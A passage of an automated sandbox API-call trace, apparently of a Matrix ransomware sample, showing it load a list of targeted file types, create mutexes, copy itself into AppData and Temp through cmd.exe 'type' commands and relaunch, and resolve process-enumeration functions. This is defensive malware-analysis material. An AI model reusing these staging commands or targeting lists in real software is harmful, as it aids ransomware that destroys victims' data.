lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0092.226] GetCurrentThreadId () returned 0xa8c [0092.226] GetCurrentThreadId () returned 0xa8c [0092.226] GetCurrentThreadId () returned 0xa8c [0092.226] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0092.226] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0092.226] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0092.226] LockResource (hResData=0x516f58) returned 0x516f58 [0092.226] FreeResource (hResData=0x516f58) returned 0 [0092.226] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0092.226] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0092.226] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0092.226] LockResource (hResData=0x50d64c) returned 0x50d64c [0092.226] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0092.226] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0092.226] FreeResource (hResData=0x50d64c) returned 0 [0092.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0092.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14150b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0092.226] GetCurrentThreadId () returned 0xa8c [0092.226] GetCurrentThreadId () returned 0xa8c [0092.227] GetCurrentThreadId () returned 0xa8c [0092.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13c39b8, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0092.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13c39b8, cbMultiByte=97, lpWideCharStr=0x1370e8c, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0092.227] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0092.227] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0092.227] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0092.227] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0092.227] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0092.227] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0092.227] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0092.227] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0092.227] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0092.227] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0092.227] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0092.227] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0092.227] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="13StarterProcessMutex4") returned 0x0 [0092.227] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="13StarterProcessMutex4") returned 0xb8 [0092.227] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="24MainProcessMutex5") returned 0x0 [0092.227] GetTickCount () returned 0x22664 [0092.227] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=14901651231) returned 1 [0092.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="X@ﰤ\x12\x0f") returned 1 [0092.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="E@ﰤ\x12\x0f") returned 1 [0092.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="Y@ﰤ\x12\x0f") returned 1 [0092.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="8@ﰤ\x12\x0f") returned 1 [0092.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="d@ﰤ\x12\x0f") returned 1 [0092.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="7@ﰤ\x12\x0f") returned 1 [0092.228] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="z@ﰤ\x12\x0f") returned 1 [0092.228] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="I@ﰤ\x12\x0f") returned 1 [0092.228] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa40, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe")) returned 0x57 [0092.228] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe", lpszShortPath=0x13b078c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE") returned 0x25 [0092.228] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0092.228] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0092.228] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\", lpszShortPath=0x13b078c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\") returned 0x2a [0092.228] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\" > \"[TO_PATH]\"", cchLength=0x3a | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\DESKTOP\\2017-0~1.EXE\" > \"[TO_PATH]\"") returned 0x3a [0092.228] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0092.228] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbac*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb9c | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\"", lpProcessInformation=0x12fb9c*(hProcess=0xc0, hThread=0xbc, dwProcessId=0xa90, dwThreadId=0xa94)) returned 1 [0092.265] WaitForSingleObject (hHandle=0xc0, dwMilliseconds=0xffffffff) returned 0x0 [0092.832] CloseHandle (hObject=0xc0) returned 1 [0092.832] CloseHandle (hObject=0xbc) returned 1 [0092.832] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe")) returned 0x2020 [0092.832] GetTickCount () returned 0x22828 [0092.832] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=14962169966) returned 1 [0092.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="C@ﰤ\x12\x0f") returned 1 [0092.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="N@ﰤ\x12\x0f") returned 1 [0092.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="u@ﰤ\x12\x0f") returned 1 [0092.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="u@ﰤ\x12\x0f") returned 1 [0092.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="8@ﰤ\x12\x0f") returned 1 [0092.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="V@ﰤ\x12\x0f") returned 1 [0092.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="y@ﰤ\x12\x0f") returned 1 [0092.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="t@ﰤ\x12\x0f") returned 1 [0092.833] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x13b078c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0092.833] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0092.833] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0092.833] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpszShortPath=0x13b078c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0092.833] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0092.833] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0092.833] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" [PARAMS]", cchLength=0xb1 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\CNUU8VYT.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\CNUU8VYT.EXE\" [PARAMS]") returned 0xb1 [0092.833] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0092.833] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb44*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb34 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"", lpProcessInformation=0x12fb34*(hProcess=0xc0, hThread=0xbc, dwProcessId=0xaac, dwThreadId=0xab0)) returned 1 [0092.840] CloseHandle (hObject=0xc0) returned 1 [0092.840] CloseHandle (hObject=0xbc) returned 1 [0092.840] Sleep (dwMilliseconds=0xfa) [0093.095] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0093.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x13ff63c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateToolhelp32Snapshot", lpUsedDefaultChar=0x0) returned 24 [0093.095] GetProcAddress (hModule=0x76910000, lpProcName="CreateToolhelp32Snapshot") returned 0x7694f731 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x13e2d2c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListFirst", lpUsedDefaultChar=0x0) returned 15 [0093.096] GetProcAddress (hModule=0x76910000, lpProcName="Heap32ListFirst") returned 0x769a02e7 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x13e2d2c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListNext", lpUsedDefaultChar=0x0) returned 14 [0093.096] GetProcAddress (hModule=0x76910000, lpProcName="Heap32ListNext") returned 0x769a0391 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x13e2d2c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32First", lpUsedDefaultChar=0x0) returned 11 [0093.096] GetProcAddress (hModule=0x76910000, lpProcName="Heap32First") returned 0x769a0429 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x13e2d2c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32Next", lpUsedDefaultChar=0x0) returned 10 [0093.096] GetProcAddress (hModule=0x76910000, lpProcName="Heap32Next") returned 0x769a0614 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x13ff63c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Toolhelp32ReadProcessMemory", lpUsedDefaultChar=0x0) returned 27 [0093.096] GetProcAddress (hModule=0x76910000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x769a0819 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x13e2d2c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32First", lpUsedDefaultChar=0x0) returned 14 [0093.096] GetProcAddress (hModule=0x76910000, lpProcName="Process32First") returned 0x7697443d [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.096] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x13e2d2c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32Next", lpUsedDefaultChar=0x0) returned 13 [0093.097] GetProcAddress (hModule=0x76910000, lpProcName="Process32Next") returned 0x76974505 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x13e2d2c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0093.097] GetProcAddress (hModule=0x76910000, lpProcName="Process32FirstW") returned 0x7694fa35 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x13e2d2c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0093.097] GetProcAddress (hModule=0x76910000, lpProcName="Process32NextW") returned 0x7694faca [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x13e2d2c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0093.097] GetProcAddress (hModule=0x76910000, lpProcName="Process32FirstW") returned 0x7694fa35 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x13e2d2c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0093.097] GetProcAddress (hModule=0x76910000, lpProcName="Process32NextW") returned 0x7694faca [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x13e2d2c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32First", lpUsedDefaultChar=0x0) returned 13 [0093.097] GetProcAddress (hModule=0x76910000, lpProcName="Thread32First") returned 0x76977e4c [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x13e2d2c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32Next", lpUsedDefaultChar=0x0) returned 12 [0093.097] GetProcAddress (hModule=0x76910000, lpProcName="Thread32Next") returned 0x76977edc [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x13e2d2c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32First", lpUsedDefaultChar=0x0) returned 13 [0093.097] GetProcAddress (hModule=0x76910000, lpProcName="Module32First") returned 0x769a0859 [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x13e2d2c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32Next", lpUsedDefaultChar=0x0) 